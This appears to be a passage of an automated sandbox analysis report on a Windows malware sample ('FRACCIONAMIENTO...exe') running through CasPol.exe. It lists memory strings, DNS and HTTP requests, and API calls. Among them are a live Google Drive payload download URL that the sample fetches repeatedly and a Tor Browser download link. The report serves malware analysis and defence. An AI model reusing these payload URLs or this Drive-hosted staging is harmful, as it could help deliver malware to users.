Source: CasPol.exe, 00000003.00000003.17013096892.0000000000E8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://doc-0c-74-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0al9jnh9
Source: CasPol.exe, 00000003.00000003.17013096892.0000000000E8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://doc-0c-74-docs.googleusercontent.com/t
Source: CasPol.exe, 00000003.00000003.15723880039.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: CasPol.exe, 00000003.00000003.16507086398.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17000172750.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16782720917.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16365039417.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17012674069.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15971309343.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15863927680.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16840295258.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16693592833.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15970658357.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16241170310.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16161966863.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16929138845.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16611111513.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16060615492.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17006207627.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16303043458.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/0
Source: CasPol.exe, 00000003.00000003.16365039417.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17006207627.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/:
Source: CasPol.exe, 00000003.00000003.16507086398.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17000172750.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16782720917.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16365039417.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17012674069.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15971309343.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15863927680.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16840295258.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16693592833.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15970658357.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16241170310.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16161966863.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16929138845.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15818747013.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16611111513.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16060615492.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17006207627.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16303043458.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15818032084.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/H
Source: CasPol.exe, 00000003.00000002.20371041773.0000000000E53000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/P
Source: CasPol.exe, 00000003.00000003.15971309343.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15970658357.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16241170310.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16161966863.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16060615492.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/R
Source: CasPol.exe, 00000003.00000003.17000172750.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16840295258.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16929138845.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17006207627.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/_1
Source: CasPol.exe, 00000003.00000003.16507086398.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17000172750.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16782720917.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17012674069.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16840295258.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16693592833.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16929138845.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16611111513.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17006207627.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/b
Source: CasPol.exe, 00000003.00000003.15971309343.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15863927680.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16840295258.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15970658357.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16929138845.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/ce.a2
Source: CasPol.exe, 00000003.00000002.20370411559.0000000000CD0000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16303043458.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15818032084.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15723880039.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E
Source: CasPol.exe, 00000003.00000003.16507086398.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16365039417.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15971309343.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16693592833.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15970658357.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16241170310.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16161966863.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16611111513.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16060615492.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16303043458.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E32859Z
Source: CasPol.exe, 00000003.00000003.15971309343.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15863927680.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15970658357.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16241170310.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16161966863.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15818747013.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16060615492.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16303043458.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15818032084.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E8
Source: CasPol.exe, 00000003.00000003.17000172750.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16782720917.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16365039417.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17012674069.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16840295258.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16693592833.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16241170310.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16929138845.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17006207627.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16303043458.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E8V2K0EcN7S0sk7E
Source: CasPol.exe, 00000003.00000003.17000172750.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16782720917.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17012674069.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16840295258.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16693592833.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16929138845.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16611111513.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17006207627.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E8V2K0EcN7S0sk7E8
Source: CasPol.exe, 00000003.00000003.16840295258.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16929138845.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E:P
Source: CasPol.exe, 00000003.00000003.16507086398.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17000172750.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16782720917.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17012674069.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15971309343.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15863927680.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16840295258.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16693592833.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15970658357.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16241170310.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16161966863.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16929138845.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15818747013.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15724350949.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16611111513.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16060615492.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17006207627.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15818032084.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15723880039.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7EX
Source: CasPol.exe, 00000003.00000002.20371210156.0000000000E69000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7EZ
Source: CasPol.exe, 00000003.00000003.17000172750.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15863927680.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16693592833.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16929138845.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15818747013.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15818032084.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/z
Source: CasPol.exe, 00000003.00000003.17281775683.00000000201A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://eca.hinet.net/repository0
Source: CasPol.exe, 00000003.00000003.17282659739.0000000020111000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: CasPol.exe, 00000003.00000003.17280609313.00000000201DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://rca.e-szigno.hu/ocsp0-
Source: CasPol.exe, 00000003.00000003.17280609313.00000000201DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repository.luxtrust.lu0
Source: CasPol.exe, 00000003.00000003.16839976993.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16782400609.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16240989645.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16999808542.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16506792862.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16161065605.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16610080924.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16928461959.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15817800617.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16692720156.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15723729253.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16060307959.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16302066204.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15637036827.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16364711225.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15970356224.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.google.com/websearch/answer/86640
Source: CasPol.exe, 00000003.00000003.17281775683.00000000201A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://web.certicamara.com/marco-legal0Z
Source: CasPol.exe, 00000003.00000003.17282659739.0000000020111000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17283285158.000000002017E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.anf.es/AC/ACTAS/789230
Source: CasPol.exe, 00000003.00000003.17282659739.0000000020111000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17283285158.000000002017E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.anf.es/AC/ANFServerCA.crl0
Source: CasPol.exe, 00000003.00000003.17282659739.0000000020111000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17283285158.000000002017E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.anf.es/address/)1(0&
Source: CasPol.exe, 00000003.00000003.17280609313.00000000201DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.catcert.net/verarrel
Source: CasPol.exe, 00000003.00000003.17280609313.00000000201DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.catcert.net/verarrel05
Source: CasPol.exe, 00000003.00000003.16839976993.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16782400609.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16240989645.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16999808542.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16506792862.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16161065605.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16928461959.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15817800617.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16692720156.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15723729253.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16060307959.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16302066204.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.16364711225.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15970356224.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: CasPol.exe, 00000003.00000003.17280609313.00000000201DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.netlock.hu/docs/
Source: CasPol.exe, 00000003.00000003.17282304601.0000000020183000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.netlock.net/docs
Source: CasPol.exe, 00000003.00000002.20396460069.000000001D291000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
Source: CasPol.exe, 00000003.00000003.17282584231.00000000201D4000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17281631999.00000000201D2000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17281402983.00000000201CA000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17282106098.00000000201D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://wwww.certigna.fr/autorites/0m
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0al9jnh9ri2cnupcf3pilpptme4k7l2h/1650461475000/18066694053602596605/*/1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0c-74-docs.googleusercontent.comConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 142.250.186.174:443 -> 192.168.11.20:49753 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49785 version: TLS 1.2
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 1_2_00405809
Source: FRACCIONAMIENTO 1722403906461L.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_00403640
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_00406D5F 1_2_00406D5F
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_71311BFF 1_2_71311BFF
